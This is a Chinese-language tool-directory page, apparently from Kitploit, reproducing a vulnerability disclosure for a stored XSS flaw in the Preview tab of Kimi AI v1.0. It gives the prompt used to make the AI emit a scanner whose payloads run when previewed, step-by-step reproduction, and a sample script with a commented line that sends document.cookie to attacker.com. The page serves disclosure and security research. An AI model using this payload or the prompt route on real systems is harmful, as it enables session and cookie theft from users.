Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/mgtx2/cve-2026-39107
漏洞分析Web应用程序漏洞利用Web安全论文与研究学习与教育
GitHubmgtx2/cve-2026-39107

CVE-2026-39107

详细披露 Kimi AI v1.0 预览选项卡中的一个存储型 XSS 漏洞,包括攻击场景、PoC 以及针对安全研究人员的修复指南。

查看仓库
13个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-39107:Kimi AI v1.0 中的跨站脚本(XSS)漏洞

描述

Kimi AI v1.0 Web 界面的“预览”功能中存在跨站脚本(XSS)漏洞。应用程序未能正确清理或编码由 AI 模型生成的 HTML/JavaScript 载荷。当用户切换到“预览”选项卡查看 AI 生成的代码时,恶意载荷直接渲染到 DOM 中,导致受害者浏览器会话中执行任意 JavaScript。

研究员

Mustafa Hameed

漏洞详情

  • 漏洞类型: 通过 AI 响应触发的存储型/类存储型跨站脚本(XSS)
  • 受影响产品: Kimi AI
  • 受影响版本: v1.0
  • 受影响组件: “预览”选项卡 / 代码渲染组件

攻击场景与利用

攻击者可以通过提示 AI 生成一个包含内置载荷的安全工具(例如,类似 XSStrike 的自动化 XSS 扫描器)来利用此漏洞。AI 生成请求的应用程序源代码,但将恶意载荷嵌入 HTML/JavaScript 框架中。当受害者导航到“预览”选项卡测试或查看生成的工具时,嵌入的恶意载荷绕过清理并立即执行。

使用的提示词:

“创建一个类似于 XSStrike 的简单基于 Web 的 XSS 扫描器工具。包含一个带有载荷列表的界面以供扫描。”

嵌入的恶意载荷示例:

root@kitploit:~
<script>
    alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>

复现步骤

  1. 登录 Kimi AI Web 平台。
  2. 提供提示词,要求创建一个包含扫描器代码的工具(例如 XSStrike 的克隆版)。
  3. 等待 AI 模型完全生成代码响应。
  4. 点击聊天界面中的“预览”选项卡查看渲染后的应用程序。
  5. 应用程序未能过滤预览容器中的 JavaScript 上下文,导致受害者浏览器中立即执行脚本。

概念验证(PoC)

以下截图展示了 XSS 载荷成功执行的结果。当导航到 “预览” 选项卡时,恶意 JavaScript 立即触发:

XSS
下载工具